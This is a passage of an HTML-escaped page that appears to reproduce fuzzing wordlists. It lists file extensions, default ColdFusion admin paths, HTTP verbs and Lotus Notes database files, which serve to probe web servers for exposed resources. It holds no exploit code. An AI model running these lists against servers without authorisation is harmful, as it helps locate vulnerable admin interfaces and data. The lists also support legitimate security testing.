.rnq&lt;br /&gt;
.rod&lt;br /&gt;
.rog&lt;br /&gt;
.roi&lt;br /&gt;
.rou&lt;br /&gt;
.rpp&lt;br /&gt;
.rpt&lt;br /&gt;
.rrt&lt;br /&gt;
.rsc&lt;br /&gt;
.rsd&lt;br /&gt;
.rsw&lt;br /&gt;
.rte&lt;br /&gt;
.rvt&lt;br /&gt;
.rwg&lt;br /&gt;
.rzb&lt;br /&gt;
.s85&lt;br /&gt;
.saf&lt;br /&gt;
.sam07&lt;br /&gt;
.sar&lt;br /&gt;
.sav&lt;br /&gt;
.sbd&lt;br /&gt;
.sbf&lt;br /&gt;
.sbq&lt;br /&gt;
.sbt&lt;br /&gt;
.sca&lt;br /&gt;
.scf&lt;br /&gt;
.sch&lt;br /&gt;
.sdb&lt;br /&gt;
.sdc&lt;br /&gt;
.sdf&lt;br /&gt;
.sdp&lt;br /&gt;
.sdq&lt;br /&gt;
.sds&lt;br /&gt;
.sen&lt;br /&gt;
.seo&lt;br /&gt;
.seq&lt;br /&gt;
.ser&lt;br /&gt;
.sgml&lt;br /&gt;
.sgn&lt;br /&gt;
.shp&lt;br /&gt;
.shs&lt;br /&gt;
.shx&lt;br /&gt;
.skc&lt;br /&gt;
.skv&lt;br /&gt;
.skx&lt;br /&gt;
.sle&lt;br /&gt;
.slk&lt;br /&gt;
.slp&lt;br /&gt;
.snapfireshow&lt;br /&gt;
.sonic&lt;br /&gt;
.soundpack&lt;br /&gt;
.spo&lt;br /&gt;
.sps&lt;br /&gt;
.spub&lt;br /&gt;
.spv&lt;br /&gt;
.sq&lt;br /&gt;
.sqd&lt;br /&gt;
.sql&lt;br /&gt;
.sqlite&lt;br /&gt;
.sqr&lt;br /&gt;
.sta&lt;br /&gt;
.stc&lt;br /&gt;
.stf&lt;br /&gt;
.stk&lt;br /&gt;
.stl&lt;br /&gt;
.stm&lt;br /&gt;
.stp&lt;br /&gt;
.str&lt;br /&gt;
.stt&lt;br /&gt;
.stw&lt;br /&gt;
.styk&lt;br /&gt;
.stykz&lt;br /&gt;
.swk&lt;br /&gt;
.sxc&lt;br /&gt;
.sxi&lt;br /&gt;
.sy3&lt;br /&gt;
.t01&lt;br /&gt;
.t02&lt;br /&gt;
.t03&lt;br /&gt;
.t04&lt;br /&gt;
.t05&lt;br /&gt;
.t06&lt;br /&gt;
.t07&lt;br /&gt;
.t08&lt;br /&gt;
.t09&lt;br /&gt;
.t2&lt;br /&gt;
.t3001&lt;br /&gt;
.tax2008&lt;br /&gt;
.tax2009&lt;br /&gt;
.tb&lt;br /&gt;
.tbk&lt;br /&gt;
.tbl&lt;br /&gt;
.tcc&lt;br /&gt;
.tcx&lt;br /&gt;
.tda&lt;br /&gt;
.tdl&lt;br /&gt;
.tdm&lt;br /&gt;
.tdt&lt;br /&gt;
.te&lt;br /&gt;
.te3&lt;br /&gt;
.teacher&lt;br /&gt;
.tef&lt;br /&gt;
.tet&lt;br /&gt;
.tfa&lt;br /&gt;
.tfd&lt;br /&gt;
.tfrd&lt;br /&gt;
.tjp&lt;br /&gt;
.tk3&lt;br /&gt;
.tkfl&lt;br /&gt;
.tmw&lt;br /&gt;
.tol&lt;br /&gt;
.topc&lt;br /&gt;
.tpb&lt;br /&gt;
.tps&lt;br /&gt;
.tr3&lt;br /&gt;
.tra&lt;br /&gt;
.trd&lt;br /&gt;
.trk&lt;br /&gt;
.trs&lt;br /&gt;
.trx&lt;br /&gt;
.tst&lt;br /&gt;
.tsv&lt;br /&gt;
.ttk&lt;br /&gt;
.txa&lt;br /&gt;
.txd&lt;br /&gt;
.txf&lt;br /&gt;
.uccapilog&lt;br /&gt;
.ud&lt;br /&gt;
.udb&lt;br /&gt;
.udeb&lt;br /&gt;
.uds&lt;br /&gt;
.ulf&lt;br /&gt;
.ulz&lt;br /&gt;
.update&lt;br /&gt;
.upoi&lt;br /&gt;
.usr&lt;br /&gt;
.uvf&lt;br /&gt;
.uwl&lt;br /&gt;
.val&lt;br /&gt;
.vbpf1&lt;br /&gt;
.vcd&lt;br /&gt;
.vce&lt;br /&gt;
.vcf&lt;br /&gt;
.vcs&lt;br /&gt;
.vdb&lt;br /&gt;
.vdx&lt;br /&gt;
.vfs&lt;br /&gt;
.vi&lt;br /&gt;
.vip&lt;br /&gt;
.vle&lt;br /&gt;
.vlg&lt;br /&gt;
.vmt&lt;br /&gt;
.voi&lt;br /&gt;
.vok&lt;br /&gt;
.vrd&lt;br /&gt;
.vscontent&lt;br /&gt;
.vsx&lt;br /&gt;
.vtx&lt;br /&gt;
.vxml&lt;br /&gt;
.w02&lt;br /&gt;
.wab&lt;br /&gt;
.wb1&lt;br /&gt;
.wb2&lt;br /&gt;
.wb3&lt;br /&gt;
.wdb&lt;br /&gt;
.wdq&lt;br /&gt;
.wea&lt;br /&gt;
.wfd&lt;br /&gt;
.wfm&lt;br /&gt;
.wgp&lt;br /&gt;
.wgt&lt;br /&gt;
.windowslivecontact&lt;br /&gt;
.wjr&lt;br /&gt;
.wk1&lt;br /&gt;
.wk2&lt;br /&gt;
.wk3&lt;br /&gt;
.wk4&lt;br /&gt;
.wk5&lt;br /&gt;
.wke&lt;br /&gt;
.wki&lt;br /&gt;
.wks&lt;br /&gt;
.wku&lt;br /&gt;
.wlmp&lt;br /&gt;
.wmdb&lt;br /&gt;
.wor&lt;br /&gt;
.wpc&lt;br /&gt;
.wpf&lt;br /&gt;
.wpo&lt;br /&gt;
.wq1&lt;br /&gt;
.wq2&lt;br /&gt;
.wtb&lt;br /&gt;
.wtr&lt;br /&gt;
.xbk&lt;br /&gt;
.xdb&lt;br /&gt;
.xdp&lt;br /&gt;
.xds&lt;br /&gt;
.xef&lt;br /&gt;
.xem&lt;br /&gt;
.xfd&lt;br /&gt;
.xfo&lt;br /&gt;
.xft&lt;br /&gt;
.xl&lt;br /&gt;
.xlc&lt;br /&gt;
.xlgc&lt;br /&gt;
.xlr&lt;br /&gt;
.xls&lt;br /&gt;
.xlsb&lt;br /&gt;
.xlsm&lt;br /&gt;
.xlsx&lt;br /&gt;
.xlt&lt;br /&gt;
.xltm&lt;br /&gt;
.xltx&lt;br /&gt;
.xlw&lt;br /&gt;
.xmcd&lt;br /&gt;
.xml&lt;br /&gt;
.xmlper&lt;br /&gt;
.xmpz&lt;br /&gt;
.xpg&lt;br /&gt;
.xpj&lt;br /&gt;
.xpm&lt;br /&gt;
.xpt&lt;br /&gt;
.xrp&lt;br /&gt;
.xsl&lt;br /&gt;
.xslt&lt;br /&gt;
.xsn&lt;br /&gt;
.xtm&lt;br /&gt;
.xtp&lt;br /&gt;
.xxd&lt;br /&gt;
.yam&lt;br /&gt;
.zap&lt;br /&gt;
.zdb&lt;br /&gt;
.zdc&lt;br /&gt;
.zix&lt;br /&gt;
.zmc&lt;br /&gt;
.zpl&lt;br /&gt;
.{pb&lt;br /&gt;
.~hm&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Compressed File Types - (Update: 16 March 2010 - Total Statements: 187) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#  Compressed File Types - (Update: 16 March 2010 - Total Statements: 187)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
&lt;br /&gt;
.0&lt;br /&gt;
.000&lt;br /&gt;
.7z&lt;br /&gt;
.a00&lt;br /&gt;
.a01&lt;br /&gt;
.a02&lt;br /&gt;
.ace&lt;br /&gt;
.ain&lt;br /&gt;
.alz&lt;br /&gt;
.apz&lt;br /&gt;
.ar&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ari&lt;br /&gt;
.arj&lt;br /&gt;
.ark&lt;br /&gt;
.axx&lt;br /&gt;
.b64&lt;br /&gt;
.ba&lt;br /&gt;
.bh&lt;br /&gt;
.boo&lt;br /&gt;
.bz&lt;br /&gt;
.bz2&lt;br /&gt;
.bzip&lt;br /&gt;
.bzip2&lt;br /&gt;
.c00&lt;br /&gt;
.c01&lt;br /&gt;
.c02&lt;br /&gt;
.car&lt;br /&gt;
.cb7&lt;br /&gt;
.cbr&lt;br /&gt;
.cbt&lt;br /&gt;
.cbz&lt;br /&gt;
.cp9&lt;br /&gt;
.cpgz&lt;br /&gt;
.cpt&lt;br /&gt;
.dar&lt;br /&gt;
.dd&lt;br /&gt;
.deb&lt;br /&gt;
.dgc&lt;br /&gt;
.dist&lt;br /&gt;
.ecs&lt;br /&gt;
.efw&lt;br /&gt;
.epi&lt;br /&gt;
.f&lt;br /&gt;
.fdp&lt;br /&gt;
.gca&lt;br /&gt;
.gz&lt;br /&gt;
.gzi&lt;br /&gt;
.gzip&lt;br /&gt;
.ha&lt;br /&gt;
.hbc&lt;br /&gt;
.hbc2&lt;br /&gt;
.hbe&lt;br /&gt;
.hki&lt;br /&gt;
.hki1&lt;br /&gt;
.hki2&lt;br /&gt;
.hki3&lt;br /&gt;
.hpk&lt;br /&gt;
.hyp&lt;br /&gt;
.ice&lt;br /&gt;
.ipg&lt;br /&gt;
.ipk&lt;br /&gt;
.ish&lt;br /&gt;
.j&lt;br /&gt;
.jar.pack&lt;br /&gt;
.jgz&lt;br /&gt;
.jic&lt;br /&gt;
.kgb&lt;br /&gt;
.lbr&lt;br /&gt;
.lemon&lt;br /&gt;
.lha&lt;br /&gt;
.lnx&lt;br /&gt;
.lqr&lt;br /&gt;
.lz&lt;br /&gt;
.lzh&lt;br /&gt;
.lzm&lt;br /&gt;
.lzma&lt;br /&gt;
.lzo&lt;br /&gt;
.lzx&lt;br /&gt;
.md&lt;br /&gt;
.mint&lt;br /&gt;
.mou&lt;br /&gt;
.mpkg&lt;br /&gt;
.mzp&lt;br /&gt;
.oar&lt;br /&gt;
.p7m&lt;br /&gt;
.pack.gz&lt;br /&gt;
.package&lt;br /&gt;
.pae&lt;br /&gt;
.pak&lt;br /&gt;
.paq6&lt;br /&gt;
.paq7&lt;br /&gt;
.paq8&lt;br /&gt;
.par&lt;br /&gt;
.par2&lt;br /&gt;
.pbi&lt;br /&gt;
.pcv&lt;br /&gt;
.pea&lt;br /&gt;
.pet&lt;br /&gt;
.pf&lt;br /&gt;
.pim&lt;br /&gt;
.pit&lt;br /&gt;
.piz&lt;br /&gt;
.pkg&lt;br /&gt;
.pup&lt;br /&gt;
.puz&lt;br /&gt;
.pwa&lt;br /&gt;
.qda&lt;br /&gt;
.r0&lt;br /&gt;
.r00&lt;br /&gt;
.r01&lt;br /&gt;
.r02&lt;br /&gt;
.r03&lt;br /&gt;
.r1&lt;br /&gt;
.r2&lt;br /&gt;
.r30&lt;br /&gt;
.rar&lt;br /&gt;
.rev&lt;br /&gt;
.rk&lt;br /&gt;
.rnc&lt;br /&gt;
.rp9&lt;br /&gt;
.rpm&lt;br /&gt;
.rte&lt;br /&gt;
.rz&lt;br /&gt;
.rzs&lt;br /&gt;
.s00&lt;br /&gt;
.s01&lt;br /&gt;
.s02&lt;br /&gt;
.s7z&lt;br /&gt;
.sar&lt;br /&gt;
.sdc&lt;br /&gt;
.sdn&lt;br /&gt;
.sea&lt;br /&gt;
.sen&lt;br /&gt;
.sfs&lt;br /&gt;
.sfx&lt;br /&gt;
.sh&lt;br /&gt;
.shar&lt;br /&gt;
.shk&lt;br /&gt;
.shr&lt;br /&gt;
.sit&lt;br /&gt;
.sitx&lt;br /&gt;
.spt&lt;br /&gt;
.sqx&lt;br /&gt;
.sqz&lt;br /&gt;
.tar&lt;br /&gt;
.tar.gz&lt;br /&gt;
.tar.xz&lt;br /&gt;
.taz&lt;br /&gt;
.tbz&lt;br /&gt;
.tbz2&lt;br /&gt;
.tg&lt;br /&gt;
.tgz&lt;br /&gt;
.tlz&lt;br /&gt;
.tlzma&lt;br /&gt;
.txz&lt;br /&gt;
.tz&lt;br /&gt;
.uc2&lt;br /&gt;
.uha&lt;br /&gt;
.vem&lt;br /&gt;
.vsi&lt;br /&gt;
.wad&lt;br /&gt;
.war&lt;br /&gt;
.wot&lt;br /&gt;
.xef&lt;br /&gt;
.xez&lt;br /&gt;
.xmcdz&lt;br /&gt;
.xpi&lt;br /&gt;
.xx&lt;br /&gt;
.xz&lt;br /&gt;
.y&lt;br /&gt;
.yz&lt;br /&gt;
.z&lt;br /&gt;
.z01&lt;br /&gt;
.z02&lt;br /&gt;
.z03&lt;br /&gt;
.z04&lt;br /&gt;
.zap&lt;br /&gt;
.zfsendtotarget&lt;br /&gt;
.zip&lt;br /&gt;
.zipx&lt;br /&gt;
.zix&lt;br /&gt;
.zoo&lt;br /&gt;
.zpi&lt;br /&gt;
.zz&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Uncommon Data File Extensions  (Update: 16 March 2010 - Total Statements: 284) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Uncommon Data File Extensions  (Update: 16 March 2010 - Total Statements: 284)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
&lt;br /&gt;
.3me&lt;br /&gt;
.3pe&lt;br /&gt;
.4dl&lt;br /&gt;
.8xk&lt;br /&gt;
.^^^&lt;br /&gt;
.aao&lt;br /&gt;
.ab2&lt;br /&gt;
.aca&lt;br /&gt;
.accdb&lt;br /&gt;
.acf&lt;br /&gt;
.acg&lt;br /&gt;
.agd&lt;br /&gt;
.an1&lt;br /&gt;
.anme&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ast&lt;br /&gt;
.att&lt;br /&gt;
.aw&lt;br /&gt;
.bafl&lt;br /&gt;
.bdf&lt;br /&gt;
.bfx&lt;br /&gt;
.bjo&lt;br /&gt;
.bld&lt;br /&gt;
.blg&lt;br /&gt;
.btf&lt;br /&gt;
.btif&lt;br /&gt;
.btr&lt;br /&gt;
.cct&lt;br /&gt;
.cdb&lt;br /&gt;
.cdd&lt;br /&gt;
.cdf&lt;br /&gt;
.cdp&lt;br /&gt;
.cdr&lt;br /&gt;
.chk&lt;br /&gt;
.ckd&lt;br /&gt;
.cl2&lt;br /&gt;
.cl4&lt;br /&gt;
.clb&lt;br /&gt;
.clix&lt;br /&gt;
.clm&lt;br /&gt;
.cmbl&lt;br /&gt;
.contact&lt;br /&gt;
.cpi&lt;br /&gt;
.cpmz&lt;br /&gt;
.csv&lt;br /&gt;
.cwz&lt;br /&gt;
.cxt&lt;br /&gt;
.daf&lt;br /&gt;
.dat&lt;br /&gt;
.data&lt;br /&gt;
.db&lt;br /&gt;
.dcf&lt;br /&gt;
.ddt&lt;br /&gt;
.dex&lt;br /&gt;
.dif&lt;br /&gt;
.dmsk&lt;br /&gt;
.dnc&lt;br /&gt;
.dpx&lt;br /&gt;
.dsd&lt;br /&gt;
.dt1&lt;br /&gt;
.dt2&lt;br /&gt;
.dta&lt;br /&gt;
.e00&lt;br /&gt;
.ec0&lt;br /&gt;
.edf&lt;br /&gt;
.eep&lt;br /&gt;
.efx&lt;br /&gt;
.enc&lt;br /&gt;
.enw&lt;br /&gt;
.epw&lt;br /&gt;
.est&lt;br /&gt;
.et&lt;br /&gt;
.eta&lt;br /&gt;
.ev3&lt;br /&gt;
.exif&lt;br /&gt;
.exp&lt;br /&gt;
.fbl&lt;br /&gt;
.fdb&lt;br /&gt;
.fid&lt;br /&gt;
.fol&lt;br /&gt;
.gdb&lt;br /&gt;
.gen&lt;br /&gt;
.gnp&lt;br /&gt;
.gpi&lt;br /&gt;
.gpx&lt;br /&gt;
.hcp&lt;br /&gt;
.hdf&lt;br /&gt;
.hmt&lt;br /&gt;
.hsk&lt;br /&gt;
.htg&lt;br /&gt;
.id2&lt;br /&gt;
.ii&lt;br /&gt;
.img&lt;br /&gt;
.ink&lt;br /&gt;
.ins&lt;br /&gt;
.irr&lt;br /&gt;
.irx&lt;br /&gt;
.iw&lt;br /&gt;
.jdb&lt;br /&gt;
.jnt&lt;br /&gt;
.job&lt;br /&gt;
.jrprint&lt;br /&gt;
.kmz&lt;br /&gt;
.lbx&lt;br /&gt;
.lex&lt;br /&gt;
.lgf&lt;br /&gt;
.lgl&lt;br /&gt;
.lib&lt;br /&gt;
.liveupdate&lt;br /&gt;
.lnt&lt;br /&gt;
.lst&lt;br /&gt;
.m&lt;br /&gt;
.masseffectprofile&lt;br /&gt;
.mat&lt;br /&gt;
.mbb&lt;br /&gt;
.mdb&lt;br /&gt;
.mem&lt;br /&gt;
.menc&lt;br /&gt;
.met&lt;br /&gt;
.mmf&lt;br /&gt;
.mng&lt;br /&gt;
.mpd&lt;br /&gt;
.mpp&lt;br /&gt;
.ms10&lt;br /&gt;
.muf&lt;br /&gt;
.mw&lt;br /&gt;
.mwf&lt;br /&gt;
.mwx&lt;br /&gt;
.nc&lt;br /&gt;
.ndx&lt;br /&gt;
.nfo&lt;br /&gt;
.not&lt;br /&gt;
.ns2&lt;br /&gt;
.ns3&lt;br /&gt;
.ns4&lt;br /&gt;
.ntx&lt;br /&gt;
.numbers&lt;br /&gt;
.ods&lt;br /&gt;
.oeaccount&lt;br /&gt;
.omcs&lt;br /&gt;
.or2&lt;br /&gt;
.or3&lt;br /&gt;
.or4&lt;br /&gt;
.or5&lt;br /&gt;
.orx&lt;br /&gt;
.out&lt;br /&gt;
.ov2&lt;br /&gt;
.ovf&lt;br /&gt;
.paf&lt;br /&gt;
.pbd&lt;br /&gt;
.pcr&lt;br /&gt;
.pdb&lt;br /&gt;
.pdx&lt;br /&gt;
.peb&lt;br /&gt;
.pec&lt;br /&gt;
.pfc&lt;br /&gt;
.pis&lt;br /&gt;
.pln&lt;br /&gt;
.pnpt&lt;br /&gt;
.pns&lt;br /&gt;
.pnt&lt;br /&gt;
.pos&lt;br /&gt;
.postal&lt;br /&gt;
.pps&lt;br /&gt;
.ppsx&lt;br /&gt;
.ppt&lt;br /&gt;
.pptm&lt;br /&gt;
.pptx&lt;br /&gt;
.pre&lt;br /&gt;
.prf&lt;br /&gt;
.psa&lt;br /&gt;
.psf&lt;br /&gt;
.pst&lt;br /&gt;
.ptz&lt;br /&gt;
.q07&lt;br /&gt;
.q3d&lt;br /&gt;
.qbw&lt;br /&gt;
.qdat&lt;br /&gt;
.qdf&lt;br /&gt;
.qfx&lt;br /&gt;
.qpf&lt;br /&gt;
.qpw&lt;br /&gt;
.qsd&lt;br /&gt;
.rcd&lt;br /&gt;
.rdx&lt;br /&gt;
.ref&lt;br /&gt;
.rmuf&lt;br /&gt;
.roi&lt;br /&gt;
.rrt&lt;br /&gt;
.rvt&lt;br /&gt;
.rwg&lt;br /&gt;
.saf&lt;br /&gt;
.sam07&lt;br /&gt;
.sbd&lt;br /&gt;
.sbf&lt;br /&gt;
.sbq&lt;br /&gt;
.sbt&lt;br /&gt;
.sdb&lt;br /&gt;
.sdc&lt;br /&gt;
.sdf&lt;br /&gt;
.sds&lt;br /&gt;
.ser&lt;br /&gt;
.sgn&lt;br /&gt;
.shs&lt;br /&gt;
.skc&lt;br /&gt;
.slk&lt;br /&gt;
.sonic&lt;br /&gt;
.soundpack&lt;br /&gt;
.spo&lt;br /&gt;
.sql&lt;br /&gt;
.stf&lt;br /&gt;
.stl&lt;br /&gt;
.stm&lt;br /&gt;
.sy3&lt;br /&gt;
.t08&lt;br /&gt;
.t09&lt;br /&gt;
.t2&lt;br /&gt;
.tax2009&lt;br /&gt;
.tdl&lt;br /&gt;
.tdt&lt;br /&gt;
.te&lt;br /&gt;
.teacher&lt;br /&gt;
.tmw&lt;br /&gt;
.tol&lt;br /&gt;
.trk&lt;br /&gt;
.trs&lt;br /&gt;
.trx&lt;br /&gt;
.tsv&lt;br /&gt;
.uccapilog&lt;br /&gt;
.ud&lt;br /&gt;
.udeb&lt;br /&gt;
.uds&lt;br /&gt;
.update&lt;br /&gt;
.uwl&lt;br /&gt;
.val&lt;br /&gt;
.vcf&lt;br /&gt;
.vdb&lt;br /&gt;
.vfs&lt;br /&gt;
.vip&lt;br /&gt;
.vle&lt;br /&gt;
.vlg&lt;br /&gt;
.vxml&lt;br /&gt;
.w02&lt;br /&gt;
.wab&lt;br /&gt;
.wb1&lt;br /&gt;
.wb3&lt;br /&gt;
.wdq&lt;br /&gt;
.wfd&lt;br /&gt;
.wfm&lt;br /&gt;
.windowslivecontact&lt;br /&gt;
.wk1&lt;br /&gt;
.wk2&lt;br /&gt;
.wk3&lt;br /&gt;
.wk4&lt;br /&gt;
.wk5&lt;br /&gt;
.wke&lt;br /&gt;
.wks&lt;br /&gt;
.wlmp&lt;br /&gt;
.wpc&lt;br /&gt;
.wpo&lt;br /&gt;
.wq1&lt;br /&gt;
.wq2&lt;br /&gt;
.wtr&lt;br /&gt;
.xbk&lt;br /&gt;
.xdb&lt;br /&gt;
.xds&lt;br /&gt;
.xfd&lt;br /&gt;
.xl&lt;br /&gt;
.xlgc&lt;br /&gt;
.xlr&lt;br /&gt;
.xls&lt;br /&gt;
.xlsx&lt;br /&gt;
.xltm&lt;br /&gt;
.xltx&lt;br /&gt;
.xml&lt;br /&gt;
.xmpz&lt;br /&gt;
.xsl&lt;br /&gt;
.xsn&lt;br /&gt;
.xtm&lt;br /&gt;
.xtp&lt;br /&gt;
.xxd&lt;br /&gt;
.{pb&lt;br /&gt;
.~hm&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cold Fusion Default Files - (Update: 16 March 2010 - Total Statements: 65) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#  Cold Fusion Default Files - (Update: 16 March 2010 - Total Statements: 65)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
&lt;br /&gt;
CFIDE/Administrator/&lt;br /&gt;
CFIDE/Administrator/index.cfm&lt;br /&gt;
CFIDE/Administrator/login.cfm&lt;br /&gt;
CFIDE/Administrator/Application.cfm&lt;br /&gt;
CFIDE/Application.cfm&lt;br /&gt;
CFIDE/adminapi/&lt;br /&gt;
CFIDE/adminapi/Application.cfm&lt;br /&gt;
CFIDE/adminapi/administrator.cfc&lt;br /&gt;
CFIDE/adminapi/base.cfc&lt;br /&gt;
CFIDE/adminapi/customtags/&lt;br /&gt;
CFIDE/adminapi/customtags/l10n.cfm&lt;br /&gt;
CFIDE/adminapi/customtags/resources&lt;br /&gt;
CFIDE/adminapi/customtags/resources/&lt;br /&gt;
CFIDE/adminapi/datasource.cfc&lt;br /&gt;
CFIDE/adminapi/debugging.cfc&lt;br /&gt;
CFIDE/adminapi/eventgateway.cfc&lt;br /&gt;
CFIDE/adminapi/extensions.cfc&lt;br /&gt;
CFIDE/adminapi/mail.cfc&lt;br /&gt;
CFIDE/adminapi/runtime.cfc&lt;br /&gt;
CFIDE/adminapi/security.cfc&lt;br /&gt;
CFIDE/adminapi/_datasource/&lt;br /&gt;
CFIDE/adminapi/_datasource/formatjdbcurl.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/getaccessdefaultsfromregistry.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/geturldefaults.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setdsn.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setmsaccessregistry.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setsldatasource.cfm&lt;br /&gt;
CFIDE/classes/&lt;br /&gt;
CFIDE/classes/cf-j2re-win.cab&lt;br /&gt;
CFIDE/classes/cfapplets.jar&lt;br /&gt;
CFIDE/classes/images&lt;br /&gt;
CFIDE/componentutils/&lt;br /&gt;
CFIDE/componentutils/Application.cfm&lt;br /&gt;
CFIDE/componentutils/cfcexplorer.cfc&lt;br /&gt;
CFIDE/componentutils/cfcexplorer_utils.cfm&lt;br /&gt;
CFIDE/componentutils/componentdetail.cfm&lt;br /&gt;
CFIDE/componentutils/componentdoc.cfm&lt;br /&gt;
CFIDE/componentutils/componentlist.cfm&lt;br /&gt;
CFIDE/componentutils/gatewaymenu&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/menu.cfc&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/menunode.cfc&lt;br /&gt;
CFIDE/componentutils/login.cfm&lt;br /&gt;
CFIDE/componentutils/packagelist.cfm&lt;br /&gt;
CFIDE/componentutils/utils.cfc&lt;br /&gt;
CFIDE/componentutils/_component_cfcToHTML.cfm&lt;br /&gt;
CFIDE/componentutils/_component_cfcToMCDL.cfm?&lt;br /&gt;
CFIDE/componentutils/_component_style.cfm&lt;br /&gt;
CFIDE/componentutils/_component_utils.cfm&lt;br /&gt;
CFIDE/debug/&lt;br /&gt;
CFIDE/debug/images/&lt;br /&gt;
CFIDE/debug/includes/&lt;br /&gt;
CFIDE/images/&lt;br /&gt;
CFIDE/images/skins/&lt;br /&gt;
CFIDE/install.cfm&lt;br /&gt;
CFIDE/installers/&lt;br /&gt;
CFIDE/installers/CFMX7DreamWeaverExtensions.mxp&lt;br /&gt;
CFIDE/installers/CFReportBuilderInstaller.exe&lt;br /&gt;
CFIDE/probe.cfm&lt;br /&gt;
CFIDE/scripts/&lt;br /&gt;
CFIDE/scripts/css/&lt;br /&gt;
CFIDE/scripts/xsl/&lt;br /&gt;
CFIDE/wizards/&lt;br /&gt;
CFIDE/wizards/common/&lt;br /&gt;
CFIDE/wizards/common/utils.cfc&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== All HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2009 - Total Statements: 31)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#  ll HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2009 - Total Statements: 31)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
&lt;br /&gt;
OPTIONS&lt;br /&gt;
GET&lt;br /&gt;
HEAD&lt;br /&gt;
POST&lt;br /&gt;
PUT&lt;br /&gt;
DELETE&lt;br /&gt;
TRACE&lt;br /&gt;
CONNECT&lt;br /&gt;
PROPFIND&lt;br /&gt;
PROPPATCH&lt;br /&gt;
MKCOL&lt;br /&gt;
COPY&lt;br /&gt;
MOVE&lt;br /&gt;
LOCK&lt;br /&gt;
UNLOCK&lt;br /&gt;
VERSION-CONTROL&lt;br /&gt;
REPORT&lt;br /&gt;
CHECKOUT&lt;br /&gt;
CHECKIN&lt;br /&gt;
UNCHECKOUT&lt;br /&gt;
MKWORKSPACE&lt;br /&gt;
UPDATE&lt;br /&gt;
LABEL&lt;br /&gt;
MERGE&lt;br /&gt;
BASELINE-CONTROL&lt;br /&gt;
MKACTIVITY&lt;br /&gt;
ORDERPATCH&lt;br /&gt;
ACL&lt;br /&gt;
PATCH&lt;br /&gt;
SEARCH&lt;br /&gt;
ARBITRARY&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Lotus/Notes Files -(Update: 02 February 2010 - Total Statements: 111)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;/852566C90012664F&lt;br /&gt;
/admin4.nsf&lt;br /&gt;
/admin5.nsf&lt;br /&gt;
/admin.nsf&lt;br /&gt;
/agentrunner.nsf&lt;br /&gt;
/alog.nsf&lt;br /&gt;
/a_domlog.nsf&lt;br /&gt;
/bookmark.nsf&lt;br /&gt;
/busytime.nsf&lt;br /&gt;
/catalog.nsf&lt;br /&gt;
/certa.nsf&lt;br /&gt;
/certlog.nsf&lt;br /&gt;
/certsrv.nsf&lt;br /&gt;
/chatlog.nsf&lt;br /&gt;
/clbusy.nsf&lt;br /&gt;
/cldbdir.nsf&lt;br /&gt;
/clusta4.nsf&lt;br /&gt;
/collect4.nsf&lt;br /&gt;
/da.nsf&lt;br /&gt;
/dba4.nsf&lt;br /&gt;
/dclf.nsf&lt;br /&gt;
/DEASAppDesign.nsf&lt;br /&gt;
/DEASLog01.nsf&lt;br /&gt;
/DEASLog02.nsf&lt;br /&gt;
/DEASLog03.nsf&lt;br /&gt;
/DEASLog04.nsf&lt;br /&gt;
/DEASLog05.nsf&lt;br /&gt;
/DEASLog.nsf&lt;br /&gt;
/decsadm.nsf&lt;br /&gt;
/decslog.nsf&lt;br /&gt;
/DEESAdmin.nsf&lt;br /&gt;
/dirassist.nsf&lt;br /&gt;
/doladmin.nsf&lt;br /&gt;
/domadmin.nsf&lt;br /&gt;
/domcfg.nsf&lt;br /&gt;
/domguide.nsf&lt;br /&gt;
/domlog.nsf&lt;br /&gt;
/dspug.nsf&lt;br /&gt;
/events4.nsf&lt;br /&gt;
/events5.nsf&lt;br /&gt;
/events.nsf&lt;br /&gt;
/event.nsf&lt;br /&gt;
/homepage.nsf&lt;br /&gt;
/iNotes/Forms5.nsf/$DefaultNav&lt;br /&gt;
/jotter.nsf&lt;br /&gt;
/leiadm.nsf&lt;br /&gt;
/leilog.nsf&lt;br /&gt;
/leivlt.nsf&lt;br /&gt;
/log4a.nsf&lt;br /&gt;
/log.nsf&lt;br /&gt;
/l_domlog.nsf&lt;br /&gt;
/mab.nsf&lt;br /&gt;
/mail10.box&lt;br /&gt;
/mail1.box&lt;br /&gt;
/mail2.box&lt;br /&gt;
/mail3.box&lt;br /&gt;
/mail4.box&lt;br /&gt;
/mail5.box&lt;br /&gt;
/mail6.box&lt;br /&gt;
/mail7.box&lt;br /&gt;
/mail8.box&lt;br /&gt;
/mail9.box&lt;br /&gt;
/mail.box&lt;br /&gt;
/msdwda.nsf&lt;br /&gt;
/mtatbls.nsf&lt;br /&gt;
/mtstore.nsf&lt;br /&gt;
/names.nsf&lt;br /&gt;
/nntppost.nsf&lt;br /&gt;
/nntp/nd000001.nsf&lt;br /&gt;
